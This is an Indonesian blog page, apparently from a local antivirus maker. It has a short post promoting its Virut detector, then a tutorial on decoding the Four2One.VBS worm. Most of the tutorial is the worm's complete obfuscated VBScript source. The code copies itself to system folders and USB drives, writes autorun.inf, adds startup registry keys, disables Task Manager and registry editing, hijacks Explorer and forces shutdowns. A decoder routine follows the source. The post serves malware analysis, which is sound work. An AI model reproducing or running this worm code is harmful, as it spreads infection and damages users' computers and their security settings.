Kalau tidak salah, baru 3 antivirus lokal yang mampu deteksi virut. Dan dengan bangga kami perkenalkan salah satunya, Morphost Antivirus. Empat bulan yang lalu detektor ini sudah kami temukan. Dan sudah satu kali diperbaiki untuk bisa dibedakan dengan virus Tenga.

Nah, sebelum kami beri cara untuk membersihkan, memberantas, dan mematikan virut, ada baiknya kami beri cara untuk mencegahnya.

Sebenarnya cukup dengan Morphost Antivirus, anda sudah menjalankan satu langkah untuk mencegah masuknya virut ke dalam komputer/laptop kesayangan anda.
Langsung saja download Morphost terbaru di http://www.morphostlab.co.nr/download
Jangan lupa juga download databasenya!

Langsung pakai dan scan flashdisk setiap kali tercolok.

Nah, misalkan kalau komputer kamu sudah terlanjur terinfeksi maka gunakan dulu antivirus Morphost untuk menscan komputer anda.
Jika misalnya ditemukan file “Terinfeksi: Virut” lebih dari 10 berarti komputer kamu sudah terinfeksi Virut!

Nah, untuk membersihkan nya kamu bisa pakai VirutKiller milik Kaspersky.

Sekian dan terima kasih.

By: Morphic Karta
http://www.morphostlab.com

Posted in Uncategorized | 57 Comments »

Mari Mendecrypt Worm Four2One.VBS!

Posted by Morphic pada Juli 23, 2010

Ini mungkin worm vbs lama, tapi saya baru dapat sampelnya dari salah satu teman saya. Nah, worm ini memakai teknik enkripsi. yang awalnya saya sempat bingung melihatnya sekilas…

tapi ada yang membuat saya menemukan code dekripsinya dalam waktu 1 detik hanya dengan melihat clue-nya saja.
Nah saya akan ajarkan kamu untuk membaca teknik enkripsi worm vbs.

Sampel yang kita ambil adalah worm Four2One.VBS

Ini sourcenya.
‘four2one.virus ver 2.0

on error resume next
dim rekur,syspath,windowpath,desa,twoone,mf,misi,tf,four2,nt,check,sd, Dn,Wd,Hn,Mn,nae, viti,ld,gap,nowd, recy

misi = ReAd( “^ovspuvb\” ) & vbcrlf & ReAd( “tcw/fmdzdfs!fyf/uqjsdtx>fuvdfyfmmfit” )

html = ReAd( “?#86!;uihjfi!<576!;iuejx!<722!;ugfm!<93!;qpu!fmzut!wje=?#111111$#>spmpdhc!zepc=” ) & vbcrlf &_
ReAd( “?wje0=?q0=?uopg0=1/3!sfw!!fop3svpg!n(j?#8#>f{jt!#fuspG#>fdbg!#DDDDDD$#>spmpd!uopg=?#sfuofd#>ohjmb!q=” ) & vbcrlf &_
ReAd( “?#2.!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=?#sfuofd#>ohjmb!q=” ) & vbcrlf &_
ReAd( “?obqt0=?#115#>uihjfi!#117#>iuejx!#HQK/922:521K0SPD17CVQ0USBQJMD0fdjggP!ugptpsdjN0tfmjG!nbshpsQ0;D#>dst!#1#>sfespc!hnj=” ) & vbcrlf &_
ReAd( “?#2!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=” ) & vbcrlf &_
ReAd( “?q0=?#sfuofd#>ohjmb!q=?q0=?obqt0=?#115#>uihjfi!#117#>iuejx!#hqk/fmhpph]34nfutzt]txpeojx];d#>dst!#1#>sfespc!hnj=” ) & vbcrlf &_
ReAd( “?#73!;uihjfi!<576!;iuejx!<722!;ugfm!<2:5!;qpu!fmzut!wje=” ) & vbcrlf &_
ReAd( “?#sfuofd#>ohjmb!q=?wje0=?q0=?c0=?uopg0=9113!mjsqB!82?#DDDDDD$#>spmpd!#5#>f{jt!#lppcmppidT!zsvuofD#>fdbg!uopg=?c=?#sfuofd#>ohjmb!q=” )

explor= ReAd( “uyfo!fnvtfs!spssf!op” ) & vbcrlf & _
ReAd( “qx!-et!-fnbOxfO!-fnbOemP!njE” ) & vbcrlf & _
ReAd( “*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft” ) & vbcrlf & _
ReAd( “*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft” ) & vbcrlf & _
ReAd( “*1)sfempgmbjdfqtufh/pd!>!qx!ufT” ) & vbcrlf & _
ReAd( “#mme/bovuspG]34nfutzt]txpeojx];d#!>!fnbOemP” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO” ) & vbcrlf & _
ReAd( “ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd” ) & vbcrlf & _
ReAd( “ofiu!96!>!sfcnvO/ssF!gj” ) & vbcrlf & _
ReAd( “ftmf” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et” ) & vbcrlf & _
ReAd( “!gj!eof” ) & vbcrlf & _
ReAd( “#fyf/sfspmqyf]#!’!qx!ovs/et” )

recy = ReAd( “uyfo!fnvtfs!spssf!op” ) & vbcrlf & _
ReAd( “qx!-et!-fnbOxfO!-fnbOemP!njE” ) & vbcrlf & _
ReAd( “*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft” ) & vbcrlf & _
ReAd( “*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft” ) & vbcrlf & _
ReAd( “*1)sfempgmbjdfqtufh/pd!>!qx!ufT” ) & vbcrlf & _
ReAd( “#ojc/fmdzdfS]#!>!fnbOemP” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO” ) & vbcrlf & _
ReAd( “ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd” ) & vbcrlf & _
ReAd( “ofiu!96!>!sfcnvO/ssF!gj” ) & vbcrlf & _
ReAd( “ftmf” ) & vbcrlf & _
ReAd( “#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et” ) & vbcrlf & _
ReAd( “!gj!eof” ) & vbcrlf & _
ReAd( “fnbommvGuqjsdT/uqjsdtX!’!#!-udfmft0-f0!fyf/sfspmqyf]#!’!qx!ovs/et” )

set twoone = createobject(ReAd( “udfkcPnfutzTfmjG/hojuqjsdT” ))
set mf = twoone.getfile (Wscript.ScriptFullname)
set four2 = createobject( ReAd( “mmfiT/uqjsdTX”) )
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Wd = weekday(Now)
Hn = hour(now)
Mn = minute(now)

Set windowpath = twoone.getspecialfolder(0)
Set syspath = twoone.getspecialfolder(1)

viti=date*1+421000014.0421
set tf = twoone.createtextfile(windowpath & ReAd( “mme/fubembdpm]” ),false)
tf.write viti
tf.close
set tf = twoone.getfile(windowpath & ReAd( “mme/fubembdpm]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “tcw/fop3svpg]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “tcw/fop3svpg]” ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath &ReAd( “tcw/fop3svpg]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “mme/bovuspG]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “mme/bovuspG]” ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath & ReAd( “mme/bovuspG]” ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.write explor
tf.close
set tf = twoone.getfile(syspath & ReAd( “tcw/sfspmqyf]” ))
tf.attributes = 39

set tf=twoone.createtextfile(syspath & ReAd( “nui/fmhpph]” ),2,true)
tf.write html
tf.close
set tf = twoone.getfile(syspath & ReAd( “nui/fmhpph]” ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( “hqk/fmhppH]” ), “c:\”, true
twoone.CopyFile syspath & ReAd( “nui/fmhppH]” ), “c:\”, true

for each desa in twoone.drives
If (desa.drivetype = 1 or desa.drivetype = 2) and desa.path “A:” and desa.path “C:” then

set tf=twoone.getfile(desa.path & ReAd( “ojc/fmdzdfS]” ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( “ojc/fmdzdfS]” ),2,true)
tf.write rekur
tf.close
set tf=twoone.getfile(desa.path & ReAd( “ojc/fmdzdfS]” ))
tf.attributes = 39

set tf=twoone.getfile(desa.path & ReAd( “tcw/fmdzdfS]” ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( “tcw/fmdzdfS]” ),2,true)
tf.write recy
tf.close
set tf=twoone.getfile(desa.path & ReAd( “tcw/fmdzdfS]” ))
tf.attributes = 39

set tf =twoone.getfile(desa.path & ReAd( “goj/ovspuvb]” ))
tf.attributes = 32
set tf=twoone.createtextfile(desa.path & ReAd( “goj/ovspuvb]” ),2,true)
tf.write misi
tf.close
set tf = twoone.getfile(desa.path & ReAd( “goj/ovspuvb]” ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( “hqk/fmhppH]” ), desa.path & “\”, true
twoone.CopyFile desa.path & ReAd( “hqk/fmhppH]” ), syspath & “\”, true
end if
next

set four2 = createobject( ReAd( “mmfiT/uqjsdTX”) )
four2.regwrite ReAd( “topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”1″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “shnltbUfmcbtjE]nfutzt]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”1″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ),”0″,ReAd(“ESPXE`HFS”)
four2.regwrite ReAd( “nfutzTugptpsdjN]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI” ), syspath & ReAd( “tcw/fop3svpg]” )

four2.regwrite ReAd( “fnbOfqzUzmeofjsG]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), ReAd( “opjtofuyF!opjubdjmqqB” )
four2.regwrite ReAd( “uyFxpiTsfwfO]fmjGTCW]UPPS`TFTTBMD`ZFLI” ),””
four2.regwrite ReAd( “]opdJumvbgfE]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), four2.RegRead (ReAd( “fmjgmme]UPPS`TFTTBMD`ZFLI” ) & ReAd( “]opdJumvbgfE]” ))
four2.regwrite ReAd( “eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI” ), “”

four2.regwrite ReAd( “sfhhvcfe]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),ReAd( “fyf/ebqfupo” )
four2.regwrite ReAd( “sfhhvcfe]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),ReAd( “fyf/ebqfupo” )

‘four2.regwrite ReAd( “effqTldjmDfmcvpE]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI”), “1”

set mf = twoone.getfile(windowpath & ReAd( “mme/fubembdpm]” ))
set ld = mf.openastextstream(1)
dn = ld.readline
nowd=date*1+421000000.0421
gap=nowd-dn

if gap>0 Then
four2.regwrite ReAd( “fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), ReAd( “nui/fmhppH];d” )
four2.regwrite ReAd( “]dfyffee]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ),””
four2.regwrite ReAd( “]eobnnpd]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ), ReAd( “tcw/sfspmqyf]34nfutzt]txpeojx];d!!fyf/uqjsdTX]34nfutzT]txpeojx];d” )
four2.regwrite ReAd( “b]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), ReAd( “tvsjw/fop3svpg” )
four2.regwrite ReAd( “utjMVSN]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI” ), “a”
four2.regwrite ReAd( “uvPfnjUfwbToffsdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”60″
four2.regwrite ReAd( “fyf/fwbtosdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ), ReAd( “sdt/e4uyfutt]]34nfutzt]]TXPEOJX]];D” )
four2.regwrite ReAd( “hojsuTzbmqtjE]E4uyfU]tsfwbtoffsdT]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI”), ReAd( “1/3!sfw!fop3svpg!n(j” )
four2.regwrite ReAd( “zujwjujtofTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”1″
four2.regwrite ReAd( “effqTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI” ),”0″
nae = four2.RegRead (ReAd( “sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ))
four2.regwrite ReAd( “]mmfit]sfempg]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI” ) & nae & ReAd( “]eobnnpd]fN!ub!lppm!ftbfmQ!t(” ),ReAd( “FYF/FSPMQYFJ” ),”REG_EXPAND_SZ”
if Wd = 5 and Hn > 12 then
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run ReAd( “1!u.!t.!fyf/oxpeuvit” )
else
if Mn = 9 or Mn = 19 or Mn = 29 or Mn = 39 or Mn = 49 or Mn = 59 then
twoone.CopyFile four2.SpecialFolders(ReAd( “uofdfs” )) & ReAd( “lom/hqk/+]” ), four2.SpecialFolders(ReAd( “qpultfE” )) & “\”, true
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run ReAd( “FYF/FSPMQYFJ” )
end if
end if
end if

if check 1 then
Wscript.sleep 80000
end if
loop while check 1
set sd = createobject(ReAd( “mmfit/uqjsdtX” ))
sd.run windowpath & ReAd( “!-udfmft0-f0!fyf/sfspmqyf]” ) & Wscript.ScriptFullname

Function ReAd( WriTe )
Dim Son, ToLo, Yo
Son = “”
For ToLo = 1 To Len( WriTe )
Yo = Mid( WriTe, ToLo, 1 )
Son = Chr( Asc( Yo ) – 1 ) & Son
Next
ReAd = Son
End Function

Baik,
yang membuat saya menemukan cluenya adalah “CreateObject”
String ini selalu diikuti WscriptFullname atau wscript.shell dan lain-lain…

Lalu saya check string ini: “mmfit/uqjsdtX”
HItung jumlah LEN-nya dan bandingkan dengan WSCRIPT.SHELL
Persis sama!!

Lalu perhatikan juga ciri-cirinya! di string code virus ada dua huruf double yaitu “mm” sedangkan WSCRIPT.SHELL ada huruf double “ll”
Sudah jelas teknik enkripsi yang dipakai adalah teknik STRREVERSE.

Oke! kita sudah dapat satu kuncinya, Lalu kunci berikutnya adalah PERGESERAN HURUF!!
Kalau si worm memakai teknik pergeseran huruf “L” menjadi “M” ini berarti ada penambahan satu karakter. Jadi untuk mendekripnya kita kurangkan satu!

Langkah-langkah yang perlu untuk mengubah ini kembali adalah:
1.ubah huruf jadi angka
2.lalu setiap angka kurangkan satu
3.kemudian ubah kembali menjadi huruf.
4.Jangan lupa teknik STRREVERSE, karena worm ini memakai teknik ini.

Sehingga didapatkan code berikut:
Private Sub Command1_Click()
Dim Kode As String
Dim i As Integer
Dim HasilAkhir As String
Kode = “ScriptYangKamuBingungKan”
Kode = StrReverse(Kode)
For i = 1 To Len(Kode)
HasilAkhir = HasilAkhir & Chr(Asc(Mid(Kode, i, 1)) – 1)
Next
MsgBox HasilAkhir
End Sub

Satu kali klik tombol hasilnya dapat! 😀

Beres sudah

by: Morphic
http://www.morphostlab.com
(Konsultasi kesehatan gratis yukk!!)

thanks to:
EDE

Posted in Uncategorized | 22 Comments »